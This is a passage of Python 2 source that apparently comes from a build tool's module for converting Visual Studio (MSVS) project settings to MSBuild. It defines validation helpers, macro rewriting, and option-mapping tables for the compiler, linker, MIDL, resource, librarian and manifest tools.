    r'(\$\((?:%s)\))(?:[\\/]+)' % "|".join(fix_vc_macro_slashes_regex_list)
)
# Regular expression to detect keys that were generated by exclusion lists
# (i.e. '<setting>_excluded'); group 1 captures the root setting name.
_EXCLUDED_SUFFIX_RE = re.compile('^(.*)_excluded$')
def _ValidateExclusionSetting(setting, settings, error_msg, stderr=sys.stderr):
  """Verify that 'setting' is valid if it is generated from an exclusion list.

  A name of the form '<root>_excluded' is accepted when '<root>' is a known
  setting; otherwise *error_msg* is emitted on *stderr*.

  Args:
    setting: A string that is the setting name to validate.
    settings: A dictionary where the keys are valid settings.
    error_msg: The message to emit in the event of error.
    stderr: The stream receiving the error messages.
  """
  match = _EXCLUDED_SUFFIX_RE.match(setting)
  if match and match.group(1) in settings:
    return
  # Unknown setting (and not a recognized exclusion variant): warn.
  print >> stderr, error_msg
def FixVCMacroSlashes(s):
  """Collapse redundant slashes that follow macros with built-in slashes.

  Macros such as $(IntDir) are known to expand with a trailing slash, and
  many scripts hiccup on paths with extra slashes in the middle.  The macro
  list is probably not exhaustive; add to it as needed.
  """
  if '$' not in s:
    return s
  return fix_vc_macro_slashes_regex.sub(r'\1', s)
def ConvertVCMacrosToMSBuild(s):
  """Rewrite the MSVS macros found in *s* to their MSBuild equivalents.

  The mapping is probably not exhaustive; add to it as needed.
  """
  if '$' not in s:
    return s
  replace_map = {
      '$(ConfigurationName)': '$(Configuration)',
      '$(InputDir)': '%(RelativeDir)',
      '$(InputExt)': '%(Extension)',
      '$(InputFileName)': '%(Filename)%(Extension)',
      '$(InputName)': '%(Filename)',
      '$(InputPath)': '%(Identity)',
      '$(ParentName)': '$(ProjectFileName)',
      '$(PlatformName)': '$(Platform)',
      '$(SafeInputName)': '%(Filename)',
  }
  for old, new in replace_map.iteritems():
    s = s.replace(old, new)
  # Also collapse any doubled slashes left after macro substitution.
  return FixVCMacroSlashes(s)
def ConvertToMSBuildSettings(msvs_settings, stderr=sys.stderr):
  """Converts MSVS settings (VS2008 and earlier) to MSBuild settings (VS2010+).

  Unknown tools and unknown settings produce warnings on *stderr* but never
  raise; conversion is best-effort.

  Args:
    msvs_settings: A dictionary.  The key is the tool name.  The values are
        themselves dictionaries of settings and their values.
    stderr: The stream receiving the error messages.
  Returns:
    A dictionary of MSBuild settings.  The key is either the MSBuild tool name
    or the empty string (for the global settings).  The values are themselves
    dictionaries of settings and their values.
  """
  msbuild_settings = {}
  for msvs_tool_name, msvs_tool_settings in msvs_settings.iteritems():
    if msvs_tool_name in _msvs_to_msbuild_converters:
      msvs_tool = _msvs_to_msbuild_converters[msvs_tool_name]
      for msvs_setting, msvs_value in msvs_tool_settings.iteritems():
        if msvs_setting in msvs_tool:
          # Invoke the translation function.
          try:
            msvs_tool[msvs_setting](msvs_value, msbuild_settings)
          except ValueError, e:
            # A bad value is reported but does not abort the conversion.
            print >> stderr, ('Warning: while converting %s/%s to MSBuild, '
                              '%s' % (msvs_tool_name, msvs_setting, e))
        else:
          # Possibly an exclusion-list key ('<name>_excluded'); warn only
          # if the root name is unknown too.
          _ValidateExclusionSetting(msvs_setting,
                                    msvs_tool,
                                    ('Warning: unrecognized setting %s/%s '
                                     'while converting to MSBuild.' %
                                     (msvs_tool_name, msvs_setting)),
                                    stderr)
    else:
      print >> stderr, ('Warning: unrecognized tool %s while converting to '
                        'MSBuild.' % msvs_tool_name)
  return msbuild_settings
def ValidateMSVSSettings(settings, stderr=sys.stderr):
  """Checks that every setting name in *settings* is known to MSVS.

  Args:
    settings: A dictionary.  The key is the tool name.  The values are
        themselves dictionaries of settings and their values.
    stderr: The stream receiving the error messages.
  """
  _ValidateSettings(_msvs_validators, settings, stderr)
def ValidateMSBuildSettings(settings, stderr=sys.stderr):
  """Checks that every setting name in *settings* is known to MSBuild.

  Args:
    settings: A dictionary.  The key is the tool name.  The values are
        themselves dictionaries of settings and their values.
    stderr: The stream receiving the error messages.
  """
  _ValidateSettings(_msbuild_validators, settings, stderr)
def _ValidateSettings(validators, settings, stderr):
  """Validates that the settings are valid for MSBuild or MSVS.

  We currently only validate the names of the settings, not their values.
  Problems are reported as warnings on *stderr*; nothing is raised.

  Args:
    validators: A dictionary of tools and their validators.
    settings: A dictionary.  The key is the tool name.  The values are
        themselves dictionaries of settings and their values.
    stderr: The stream receiving the error messages.
  """
  for tool_name in settings:
    if tool_name in validators:
      tool_validators = validators[tool_name]
      for setting, value in settings[tool_name].iteritems():
        if setting in tool_validators:
          try:
            tool_validators[setting](value)
          except ValueError, e:
            print >> stderr, ('Warning: for %s/%s, %s' %
                              (tool_name, setting, e))
        else:
          # Possibly an exclusion-list key ('<name>_excluded'); warn only
          # if the root name is unknown too.
          _ValidateExclusionSetting(setting,
                                    tool_validators,
                                    ('Warning: unrecognized setting %s/%s' %
                                     (tool_name, setting)),
                                    stderr)
    else:
      print >> stderr, ('Warning: unrecognized tool %s' % tool_name)
# MSVS and MBuild names of the tools.
_compile = _Tool('VCCLCompilerTool', 'ClCompile')
_link = _Tool('VCLinkerTool', 'Link')
_midl = _Tool('VCMIDLTool', 'Midl')
_rc = _Tool('VCResourceCompilerTool', 'ResourceCompile')
_lib = _Tool('VCLibrarianTool', 'Lib')
_manifest = _Tool('VCManifestTool', 'Manifest')
_masm = _Tool('MASM', 'MASM')
_AddTool(_compile)
_AddTool(_link)
_AddTool(_midl)
_AddTool(_rc)
_AddTool(_lib)
_AddTool(_manifest)
_AddTool(_masm)
# Add sections only found in the MSBuild settings.
_msbuild_validators[''] = {}
_msbuild_validators['ProjectReference'] = {}
_msbuild_validators['ManifestResourceCompile'] = {}
# Descriptions of the compiler options, i.e. VCCLCompilerTool in MSVS and
# ClCompile in MSBuild.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\cl.xml" for
# the schema of the MSBuild ClCompile settings.
# Options that have the same name in MSVS and MSBuild
_Same(_compile, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_compile, 'AdditionalOptions', _string_list)
_Same(_compile, 'AdditionalUsingDirectories', _folder_list) # /AI
_Same(_compile, 'AssemblerListingLocation', _file_name) # /Fa
_Same(_compile, 'BrowseInformationFile', _file_name)
_Same(_compile, 'BufferSecurityCheck', _boolean) # /GS
_Same(_compile, 'DisableLanguageExtensions', _boolean) # /Za
_Same(_compile, 'DisableSpecificWarnings', _string_list) # /wd
_Same(_compile, 'EnableFiberSafeOptimizations', _boolean) # /GT
_Same(_compile, 'EnablePREfast', _boolean) # /analyze Visible='false'
_Same(_compile, 'ExpandAttributedSource', _boolean) # /Fx
_Same(_compile, 'FloatingPointExceptions', _boolean) # /fp:except
_Same(_compile, 'ForceConformanceInForLoopScope', _boolean) # /Zc:forScope
_Same(_compile, 'ForcedIncludeFiles', _file_list) # /FI
_Same(_compile, 'ForcedUsingFiles', _file_list) # /FU
_Same(_compile, 'GenerateXMLDocumentationFiles', _boolean) # /doc
_Same(_compile, 'IgnoreStandardIncludePath', _boolean) # /X
_Same(_compile, 'MinimalRebuild', _boolean) # /Gm
_Same(_compile, 'OmitDefaultLibName', _boolean) # /Zl
_Same(_compile, 'OmitFramePointers', _boolean) # /Oy
_Same(_compile, 'PreprocessorDefinitions', _string_list) # /D
_Same(_compile, 'ProgramDataBaseFileName', _file_name) # /Fd
_Same(_compile, 'RuntimeTypeInfo', _boolean) # /GR
_Same(_compile, 'ShowIncludes', _boolean) # /showIncludes
_Same(_compile, 'SmallerTypeCheck', _boolean) # /RTCc
_Same(_compile, 'StringPooling', _boolean) # /GF
_Same(_compile, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_compile, 'TreatWChar_tAsBuiltInType', _boolean) # /Zc:wchar_t
_Same(_compile, 'UndefineAllPreprocessorDefinitions', _boolean) # /u
_Same(_compile, 'UndefinePreprocessorDefinitions', _string_list) # /U
_Same(_compile, 'UseFullPaths', _boolean) # /FC
_Same(_compile, 'WholeProgramOptimization', _boolean) # /GL
_Same(_compile, 'XMLDocumentationFileName', _file_name)
_Same(_compile, 'AssemblerOutput',
_Enumeration(['NoListing',
'AssemblyCode', # /FA
'All', # /FAcs
'AssemblyAndMachineCode', # /FAc
'AssemblyAndSourceCode'])) # /FAs
_Same(_compile, 'BasicRuntimeChecks',
_Enumeration(['Default',
'StackFrameRuntimeCheck', # /RTCs
'UninitializedLocalUsageCheck', # /RTCu
'EnableFastChecks'])) # /RTC1
_Same(_compile, 'BrowseInformation',
_Enumeration(['false',
'true', # /FR
'true'])) # /Fr
_Same(_compile, 'CallingConvention',
_Enumeration(['Cdecl', # /Gd
'FastCall', # /Gr
'StdCall', # /Gz
'VectorCall'])) # /Gv
_Same(_compile, 'CompileAs',
_Enumeration(['Default',
'CompileAsC', # /TC
'CompileAsCpp'])) # /TP
_Same(_compile, 'DebugInformationFormat',
_Enumeration(['', # Disabled
'OldStyle', # /Z7
None,
'ProgramDatabase', # /Zi
'EditAndContinue'])) # /ZI
_Same(_compile, 'EnableEnhancedInstructionSet',
_Enumeration(['NotSet',
'StreamingSIMDExtensions', # /arch:SSE
'StreamingSIMDExtensions2', # /arch:SSE2
'AdvancedVectorExtensions', # /arch:AVX (vs2012+)
'NoExtensions', # /arch:IA32 (vs2012+)
# This one only exists in the new msbuild format.
'AdvancedVectorExtensions2', # /arch:AVX2 (vs2013r2+)
]))
_Same(_compile, 'ErrorReporting',
_Enumeration(['None', # /errorReport:none
'Prompt', # /errorReport:prompt
'Queue'], # /errorReport:queue
new=['Send'])) # /errorReport:send"
_Same(_compile, 'ExceptionHandling',
_Enumeration(['false',
'Sync', # /EHsc
'Async'], # /EHa
new=['SyncCThrow'])) # /EHs
_Same(_compile, 'FavorSizeOrSpeed',
_Enumeration(['Neither',
'Speed', # /Ot
'Size'])) # /Os
_Same(_compile, 'FloatingPointModel',
_Enumeration(['Precise', # /fp:precise
'Strict', # /fp:strict
'Fast'])) # /fp:fast
_Same(_compile, 'InlineFunctionExpansion',
_Enumeration(['Default',
'OnlyExplicitInline', # /Ob1
'AnySuitable'], # /Ob2
new=['Disabled'])) # /Ob0
_Same(_compile, 'Optimization',
_Enumeration(['Disabled', # /Od
'MinSpace', # /O1
'MaxSpeed', # /O2
'Full'])) # /Ox
_Same(_compile, 'RuntimeLibrary',
_Enumeration(['MultiThreaded', # /MT
'MultiThreadedDebug', # /MTd
'MultiThreadedDLL', # /MD
'MultiThreadedDebugDLL'])) # /MDd
_Same(_compile, 'StructMemberAlignment',
_Enumeration(['Default',
'1Byte', # /Zp1
'2Bytes', # /Zp2
'4Bytes', # /Zp4
'8Bytes', # /Zp8
'16Bytes'])) # /Zp16
_Same(_compile, 'WarningLevel',
_Enumeration(['TurnOffAllWarnings', # /W0
'Level1', # /W1
'Level2', # /W2
'Level3', # /W3
'Level4'], # /W4
new=['EnableAllWarnings'])) # /Wall
# Options found in MSVS that have been renamed in MSBuild.
_Renamed(_compile, 'EnableFunctionLevelLinking', 'FunctionLevelLinking',
_boolean) # /Gy
_Renamed(_compile, 'EnableIntrinsicFunctions', 'IntrinsicFunctions',
_boolean) # /Oi
_Renamed(_compile, 'KeepComments', 'PreprocessKeepComments', _boolean) # /C
_Renamed(_compile, 'ObjectFile', 'ObjectFileName', _file_name) # /Fo
_Renamed(_compile, 'OpenMP', 'OpenMPSupport', _boolean) # /openmp
_Renamed(_compile, 'PrecompiledHeaderThrough', 'PrecompiledHeaderFile',
_file_name) # Used with /Yc and /Yu
_Renamed(_compile, 'PrecompiledHeaderFile', 'PrecompiledHeaderOutputFile',
_file_name) # /Fp
_Renamed(_compile, 'UsePrecompiledHeader', 'PrecompiledHeader',
_Enumeration(['NotUsing', # VS recognized '' for this value too.
'Create', # /Yc
'Use'])) # /Yu
_Renamed(_compile, 'WarnAsError', 'TreatWarningAsError', _boolean) # /WX
_ConvertedToAdditionalOption(_compile, 'DefaultCharIsUnsigned', '/J')
# MSVS options not found in MSBuild.
_MSVSOnly(_compile, 'Detect64BitPortabilityProblems', _boolean)
_MSVSOnly(_compile, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_compile, 'BuildingInIDE', _boolean)
_MSBuildOnly(_compile, 'CompileAsManaged',
_Enumeration([], new=['false',
'true'])) # /clr
_MSBuildOnly(_compile, 'CreateHotpatchableImage', _boolean) # /hotpatch
_MSBuildOnly(_compile, 'MultiProcessorCompilation', _boolean) # /MP
_MSBuildOnly(_compile, 'PreprocessOutputPath', _string) # /Fi
_MSBuildOnly(_compile, 'ProcessorNumber', _integer) # the number of processors
_MSBuildOnly(_compile, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_compile, 'TreatSpecificWarningsAsErrors', _string_list) # /we
_MSBuildOnly(_compile, 'UseUnicodeForAssemblerListing', _boolean) # /FAu
# Defines a setting that needs very customized processing
_CustomGeneratePreprocessedFile(_compile, 'GeneratePreprocessedFile')
# Directives for converting MSVS VCLinkerTool to MSBuild Link.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\link.xml" for
# the schema of the MSBuild Link settings.
# Options that have the same name in MSVS and MSBuild
_Same(_link, 'AdditionalDependencies', _file_list)
_Same(_link, 'AdditionalLibraryDirectories', _folder_list) # /LIBPATH
# /MANIFESTDEPENDENCY:
_Same(_link, 'AdditionalManifestDependencies', _file_list)
_Same(_link, 'AdditionalOptions', _string_list)
_Same(_link, 'AddModuleNamesToAssembly', _file_list) # /ASSEMBLYMODULE
_Same(_link, 'AllowIsolation', _boolean) # /ALLOWISOLATION
_Same(_link, 'AssemblyLinkResource', _file_list) # /ASSEMBLYLINKRESOURCE
_Same(_link, 'BaseAddress', _string) # /BASE
_Same(_link, 'CLRUnmanagedCodeCheck', _boolean) # /CLRUNMANAGEDCODECHECK
_Same(_link, 'DelayLoadDLLs', _file_list) # /DELAYLOAD
_Same(_link, 'DelaySign', _boolean) # /DELAYSIGN
_Same(_link, 'EmbedManagedResourceFile', _file_list) # /ASSEMBLYRESOURCE
_Same(_link, 'EnableUAC', _boolean) # /MANIFESTUAC
_Same(_link, 'EntryPointSymbol', _string) # /ENTRY
_Same(_link, 'ForceSymbolReferences', _file_list) # /INCLUDE
_Same(_link, 'FunctionOrder', _file_name) # /ORDER
_Same(_link, 'GenerateDebugInformation', _boolean) # /DEBUG
_Same(_link, 'GenerateMapFile', _boolean) # /MAP
_Same(_link, 'HeapCommitSize', _string)
_Same(_link, 'HeapReserveSize', _string) # /HEAP
_Same(_link, 'IgnoreAllDefaultLibraries', _boolean) # /NODEFAULTLIB
_Same(_link, 'IgnoreEmbeddedIDL', _boolean) # /IGNOREIDL
_Same(_link, 'ImportLibrary', _file_name) # /IMPLIB
_Same(_link, 'KeyContainer', _file_name) # /KEYCONTAINER
_Same(_link, 'KeyFile', _file_name) # /KEYFILE
_Same(_link, 'ManifestFile', _file_name) # /ManifestFile
_Same(_link, 'MapExports', _boolean) # /MAPINFO:EXPORTS
_Same(_link, 'MapFileName', _file_name)
_Same(_link, 'MergedIDLBaseFileName', _file_name) # /IDLOUT
_Same(_link, 'MergeSections', _string) # /MERGE
_Same(_link, 'MidlCommandFile', _file_name) # /MIDL
_Same(_link, 'ModuleDefinitionFile', _file_name) # /DEF
_Same(_link, 'OutputFile', _file_name) # /OUT
_Same(_link, 'PerUserRedirection', _boolean)
_Same(_link, 'Profile', _boolean) # /PROFILE
_Same(_link, 'ProfileGuidedDatabase', _file_name) # /PGD
_Same(_link, 'ProgramDatabaseFile', _file_name) # /PDB
_Same(_link, 'RegisterOutput', _boolean)
_Same(_link, 'SetChecksum', _boolean) # /RELEASE
_Same(_link, 'StackCommitSize', _string)
_Same(_link, 'StackReserveSize', _string) # /STACK
_Same(_link, 'StripPrivateSymbols', _file_name) # /PDBSTRIPPED
_Same(_link, 'SupportUnloadOfDelayLoadedDLL', _boolean) # /DELAY:UNLOAD
_Same(_link, 'SuppressStartupBanner', _boolean) # /NOLOGO
_Same(_link, 'SwapRunFromCD', _boolean) # /SWAPRUN:CD
_Same(_link, 'TurnOffAssemblyGeneration', _boolean) # /NOASSEMBLY
_Same(_link, 'TypeLibraryFile', _file_name) # /TLBOUT
_Same(_link, 'TypeLibraryResourceID', _integer) # /TLBID
_Same(_link, 'UACUIAccess', _boolean) # /uiAccess='true'
_Same(_link, 'Version', _string) # /VERSION
_Same(_link, 'EnableCOMDATFolding', _newly_boolean) # /OPT:ICF
_Same(_link, 'FixedBaseAddress', _newly_boolean) # /FIXED
_Same(_link, 'LargeAddressAware', _newly_boolean) # /LARGEADDRESSAWARE
_Same(_link, 'OptimizeReferences', _newly_boolean) # /OPT:REF
_Same(_link, 'RandomizedBaseAddress', _newly_boolean) # /DYNAMICBASE
_Same(_link, 'TerminalServerAware', _newly_boolean) # /TSAWARE
_subsystem_enumeration = _Enumeration(
['NotSet',
'Console', # /SUBSYSTEM:CONSOLE
'Windows', # /SUBSYSTEM:WINDOWS
'Native', # /SUBSYSTEM:NATIVE
'EFI Application', # /SUBSYSTEM:EFI_APPLICATION
'EFI Boot Service Driver', # /SUBSYSTEM:EFI_BOOT_SERVICE_DRIVER
'EFI ROM', # /SUBSYSTEM:EFI_ROM
'EFI Runtime', # /SUBSYSTEM:EFI_RUNTIME_DRIVER
'WindowsCE'], # /SUBSYSTEM:WINDOWSCE
new=['POSIX']) # /SUBSYSTEM:POSIX
_target_machine_enumeration = _Enumeration(
['NotSet',
'MachineX86', # /MACHINE:X86
None,
'MachineARM', # /MACHINE:ARM
'MachineEBC', # /MACHINE:EBC
'MachineIA64', # /MACHINE:IA64
None,
'MachineMIPS', # /MACHINE:MIPS
'MachineMIPS16', # /MACHINE:MIPS16
'MachineMIPSFPU', # /MACHINE:MIPSFPU
'MachineMIPSFPU16', # /MACHINE:MIPSFPU16
None,
None,
None,
'MachineSH4', # /MACHINE:SH4
None,
'MachineTHUMB', # /MACHINE:THUMB
'MachineX64']) # /MACHINE:X64
_Same(_link, 'AssemblyDebug',
_Enumeration(['',
'true', # /ASSEMBLYDEBUG
'false'])) # /ASSEMBLYDEBUG:DISABLE
_Same(_link, 'CLRImageType',
_Enumeration(['Default',
'ForceIJWImage', # /CLRIMAGETYPE:IJW
'ForcePureILImage', # /Switch="CLRIMAGETYPE:PURE
'ForceSafeILImage'])) # /Switch="CLRIMAGETYPE:SAFE
_Same(_link, 'CLRThreadAttribute',
_Enumeration(['DefaultThreadingAttribute', # /CLRTHREADATTRIBUTE:NONE
'MTAThreadingAttribute', # /CLRTHREADATTRIBUTE:MTA
'STAThreadingAttribute'])) # /CLRTHREADATTRIBUTE:STA
_Same(_link, 'DataExecutionPrevention',
_Enumeration(['',
'false', # /NXCOMPAT:NO
'true'])) # /NXCOMPAT
_Same(_link, 'Driver',
_Enumeration(['NotSet',
'Driver', # /Driver
'UpOnly', # /DRIVER:UPONLY
'WDM'])) # /DRIVER:WDM
_Same(_link, 'LinkTimeCodeGeneration',
_Enumeration(['Default',
'UseLinkTimeCodeGeneration', # /LTCG
'PGInstrument', # /LTCG:PGInstrument
'PGOptimization', # /LTCG:PGOptimize
'PGUpdate'])) # /LTCG:PGUpdate
_Same(_link, 'ShowProgress',
_Enumeration(['NotSet',
'LinkVerbose', # /VERBOSE
'LinkVerboseLib'], # /VERBOSE:Lib
new=['LinkVerboseICF', # /VERBOSE:ICF
'LinkVerboseREF', # /VERBOSE:REF
'LinkVerboseSAFESEH', # /VERBOSE:SAFESEH
'LinkVerboseCLR'])) # /VERBOSE:CLR
_Same(_link, 'SubSystem', _subsystem_enumeration)
_Same(_link, 'TargetMachine', _target_machine_enumeration)
_Same(_link, 'UACExecutionLevel',
_Enumeration(['AsInvoker', # /level='asInvoker'
'HighestAvailable', # /level='highestAvailable'
'RequireAdministrator'])) # /level='requireAdministrator'
_Same(_link, 'MinimumRequiredVersion', _string)
_Same(_link, 'TreatLinkerWarningAsErrors', _boolean) # /WX
# Options found in MSVS that have been renamed in MSBuild.
_Renamed(_link, 'ErrorReporting', 'LinkErrorReporting',
_Enumeration(['NoErrorReport', # /ERRORREPORT:NONE
'PromptImmediately', # /ERRORREPORT:PROMPT
'QueueForNextLogin'], # /ERRORREPORT:QUEUE
new=['SendErrorReport'])) # /ERRORREPORT:SEND
_Renamed(_link, 'IgnoreDefaultLibraryNames', 'IgnoreSpecificDefaultLibraries',
_file_list) # /NODEFAULTLIB
_Renamed(_link, 'ResourceOnlyDLL', 'NoEntryPoint', _boolean) # /NOENTRY
_Renamed(_link, 'SwapRunFromNet', 'SwapRunFromNET', _boolean) # /SWAPRUN:NET
_Moved(_link, 'GenerateManifest', '', _boolean)
_Moved(_link, 'IgnoreImportLibrary', '', _boolean)
_Moved(_link, 'LinkIncremental', '', _newly_boolean)
_Moved(_link, 'LinkLibraryDependencies', 'ProjectReference', _boolean)
_Moved(_link, 'UseLibraryDependencyInputs', 'ProjectReference', _boolean)
# MSVS options not found in MSBuild.
_MSVSOnly(_link, 'OptimizeForWindows98', _newly_boolean)
_MSVSOnly(_link, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_link, 'BuildingInIDE', _boolean)
_MSBuildOnly(_link, 'ImageHasSafeExceptionHandlers', _boolean) # /SAFESEH
_MSBuildOnly(_link, 'LinkDLL', _boolean) # /DLL Visible='false'
_MSBuildOnly(_link, 'LinkStatus', _boolean) # /LTCG:STATUS
_MSBuildOnly(_link, 'PreventDllBinding', _boolean) # /ALLOWBIND
_MSBuildOnly(_link, 'SupportNobindOfDelayLoadedDLL', _boolean) # /DELAY:NOBIND
_MSBuildOnly(_link, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_link, 'MSDOSStubFileName', _file_name) # /STUB Visible='false'
_MSBuildOnly(_link, 'SectionAlignment', _integer) # /ALIGN
_MSBuildOnly(_link, 'SpecifySectionAttributes', _string) # /SECTION
_MSBuildOnly(_link, 'ForceFileOutput',
_Enumeration([], new=['Enabled', # /FORCE
# /FORCE:MULTIPLE
'MultiplyDefinedSymbolOnly',
'UndefinedSymbolOnly'])) # /FORCE:UNRESOLVED
_MSBuildOnly(_link, 'CreateHotPatchableImage',
_Enumeration([], new=['Enabled', # /FUNCTIONPADMIN
'X86Image', # /FUNCTIONPADMIN:5
'X64Image', # /FUNCTIONPADMIN:6
'ItaniumImage'])) # /FUNCTIONPADMIN:16
_MSBuildOnly(_link, 'CLRSupportLastError',
_Enumeration([], new=['Enabled', # /CLRSupportLastError
'Disabled', # /CLRSupportLastError:NO
# /CLRSupportLastError:SYSTEMDLL
'SystemDlls']))
# Directives for converting VCResourceCompilerTool to ResourceCompile.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\rc.xml" for
# the schema of the MSBuild ResourceCompile settings.
_Same(_rc, 'AdditionalOptions', _string_list)
_Same(_rc, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_rc, 'Culture', _Integer(msbuild_base=16))
_Same(_rc, 'IgnoreStandardIncludePath', _boolean) # /X
_Same(_rc, 'PreprocessorDefinitions', _string_list) # /D
_Same(_rc, 'ResourceOutputFileName', _string) # /fo
_Same(_rc, 'ShowProgress', _boolean) # /v
# There is no UI in VisualStudio 2008 to set the following properties.
# However they are found in CL and other tools. Include them here for
# completeness, as they are very likely to have the same usage pattern.
_Same(_rc, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_rc, 'UndefinePreprocessorDefinitions', _string_list) # /u
# MSBuild options not found in MSVS.
_MSBuildOnly(_rc, 'NullTerminateStrings', _boolean) # /n
_MSBuildOnly(_rc, 'TrackerLogDirectory', _folder_name)
# Directives for converting VCMIDLTool to Midl.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\midl.xml" for
# the schema of the MSBuild Midl settings.
_Same(_midl, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_midl, 'AdditionalOptions', _string_list)
_Same(_midl, 'CPreprocessOptions', _string) # /cpp_opt
_Same(_midl, 'ErrorCheckAllocations', _boolean) # /error allocation
_Same(_midl, 'ErrorCheckBounds', _boolean) # /error bounds_check
_Same(_midl, 'ErrorCheckEnumRange', _boolean) # /error enum
_Same(_midl, 'ErrorCheckRefPointers', _boolean) # /error ref
_Same(_midl, 'ErrorCheckStubData', _boolean) # /error stub_data
_Same(_midl, 'GenerateStublessProxies', _boolean) # /Oicf
_Same(_midl, 'GenerateTypeLibrary', _boolean)
_Same(_midl, 'HeaderFileName', _file_name) # /h
_Same(_midl, 'IgnoreStandardIncludePath', _boolean) # /no_def_idir
_Same(_midl, 'InterfaceIdentifierFileName', _file_name) # /iid
_Same(_midl, 'MkTypLibCompatible', _boolean) # /mktyplib203
_Same(_midl, 'OutputDirectory', _string) # /out
_Same(_midl, 'PreprocessorDefinitions', _string_list) # /D
_Same(_midl, 'ProxyFileName', _file_name) # /proxy
_Same(_midl, 'RedirectOutputAndErrors', _file_name) # /o
_Same(_midl, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_midl, 'TypeLibraryName', _file_name) # /tlb
_Same(_midl, 'UndefinePreprocessorDefinitions', _string_list) # /U
_Same(_midl, 'WarnAsError', _boolean) # /WX
_Same(_midl, 'DefaultCharType',
_Enumeration(['Unsigned', # /char unsigned
'Signed', # /char signed
'Ascii'])) # /char ascii7
_Same(_midl, 'TargetEnvironment',
_Enumeration(['NotSet',
'Win32', # /env win32
'Itanium', # /env ia64
'X64'])) # /env x64
_Same(_midl, 'EnableErrorChecks',
_Enumeration(['EnableCustom',
'None', # /error none
'All'])) # /error all
_Same(_midl, 'StructMemberAlignment',
_Enumeration(['NotSet',
'1', # Zp1
'2', # Zp2
'4', # Zp4
'8'])) # Zp8
_Same(_midl, 'WarningLevel',
_Enumeration(['0', # /W0
'1', # /W1
'2', # /W2
'3', # /W3
'4'])) # /W4
_Renamed(_midl, 'DLLDataFileName', 'DllDataFileName', _file_name) # /dlldata
_Renamed(_midl, 'ValidateParameters', 'ValidateAllParameters',
_boolean) # /robust
# MSBuild options not found in MSVS.
_MSBuildOnly(_midl, 'ApplicationConfigurationMode', _boolean) # /app_config
_MSBuildOnly(_midl, 'ClientStubFile', _file_name) # /cstub
_MSBuildOnly(_midl, 'GenerateClientFiles',
_Enumeration([], new=['Stub', # /client stub
'None'])) # /client none
_MSBuildOnly(_midl, 'GenerateServerFiles',
_Enumeration([], new=['Stub', # /client stub
'None'])) # /client none
_MSBuildOnly(_midl, 'LocaleID', _integer) # /lcid DECIMAL
_MSBuildOnly(_midl, 'ServerStubFile', _file_name) # /sstub
_MSBuildOnly(_midl, 'SuppressCompilerWarnings', _boolean) # /no_warn
_MSBuildOnly(_midl, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_midl, 'TypeLibFormat',
_Enumeration([], new=['NewFormat', # /newtlb
'OldFormat'])) # /oldtlb
# Directives for converting VCLibrarianTool to Lib.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\lib.xml" for
# the schema of the MSBuild Lib settings.
_Same(_lib, 'AdditionalDependencies', _file_list)
_Same(_lib, 'AdditionalLibraryDirectories', _folder_list) # /LIBPATH
_Same(_lib, 'AdditionalOptions', _string_list)
_Same(_lib, 'ExportNamedFunctions', _string_list) # /EXPORT
_Same(_lib, 'ForceSymbolReferences', _string) # /INCLUDE
_Same(_lib, 'IgnoreAllDefaultLibraries', _boolean) # /NODEFAULTLIB
_Same(_lib, 'IgnoreSpecificDefaultLibraries', _file_list) # /NODEFAULTLIB
_Same(_lib, 'ModuleDefinitionFile', _file_name) # /DEF
_Same(_lib, 'OutputFile', _file_name) # /OUT
_Same(_lib, 'SuppressStartupBanner', _boolean) # /NOLOGO
_Same(_lib, 'UseUnicodeResponseFiles', _boolean)
_Same(_lib, 'LinkTimeCodeGeneration', _boolean) # /LTCG
_Same(_lib, 'TargetMachine', _target_machine_enumeration)
# TODO(jeanluc) _link defines the same value that gets moved to
# ProjectReference. We may want to validate that they are consistent.
_Moved(_lib, 'LinkLibraryDependencies', 'ProjectReference', _boolean)
_MSBuildOnly(_lib, 'DisplayLibrary', _string) # /LIST Visible='false'
_MSBuildOnly(_lib, 'ErrorReporting',
_Enumeration([], new=['PromptImmediately', # /ERRORREPORT:PROMPT
'QueueForNextLogin', # /ERRORREPORT:QUEUE
'SendErrorReport', # /ERRORREPORT:SEND
'NoErrorReport'])) # /ERRORREPORT:NONE
_MSBuildOnly(_lib, 'MinimumRequiredVersion', _string)
_MSBuildOnly(_lib, 'Name', _file_name) # /NAME
_MSBuildOnly(_lib, 'RemoveObjects', _file_list) # /REMOVE
_MSBuildOnly(_lib, 'SubSystem', _subsystem_enumeration)
_MSBuildOnly(_lib, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_lib, 'TreatLibWarningAsErrors', _boolean) # /WX
_MSBuildOnly(_lib, 'Verbose', _boolean)
# Directives for converting VCManifestTool to Mt.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\mt.xml" for
# the schema of the MSBuild Lib settings.
# Options that have the same name in MSVS and MSBuild
_Same(_manifest, 'AdditionalManifestFiles', _file_list) # /manifest
_Same(_manifest, 'AdditionalOptions', _string_list)
_Same(_manifest, 'AssemblyIdentity', _string) # /identity:
_Same(_manifest, 'ComponentFileName', _file_name) # /dll
_Same(_manifest, 'GenerateCatalogFiles', _boolean) # /makecdfs
_Same(_manifest, 'InputResourceManifests', _string) # /inputresource
_Same(_manifest, 'OutputManifestFile', _file_name) # /out
_Same(_manifest, 'RegistrarScriptFile', _file_name) # /rgs
_Same(_manifest, 'ReplacementsFile', _file_name) # /replacements
_Same(_manifest, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_manifest, 'TypeLibraryFile', _file_name) # /tlb:
